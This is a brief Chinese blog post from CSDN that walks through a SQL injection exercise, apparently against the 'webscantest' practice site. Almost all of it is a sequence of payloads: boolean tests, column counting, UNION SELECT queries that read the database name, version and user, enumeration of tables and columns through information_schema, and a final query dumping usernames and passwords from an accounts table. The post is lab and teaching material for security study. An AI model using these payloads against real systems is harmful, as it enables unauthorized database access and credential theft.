sql 注入实操
and 1=1
and 1=2测试注入点
发现注入点 sql注入
order by n 测试列数
测试结果为4
爆库 版本 用户
union selec 1,2,database(),4
union selec 1,2,version(),4
union selec 1,2,user(),4
爆破表
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = ‘webscantest’ ),3,4
爆字段
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘webscantest’ and table_name=‘accounts’ ),3 ,4
查询内容
union select 1,group_concat(uname,0x3a,passwd),3,4 from webscantest.accounts
来源:CSDN
作者:qq_43193681
链接:https://blog.csdn.net/qq_43193681/article/details/104650302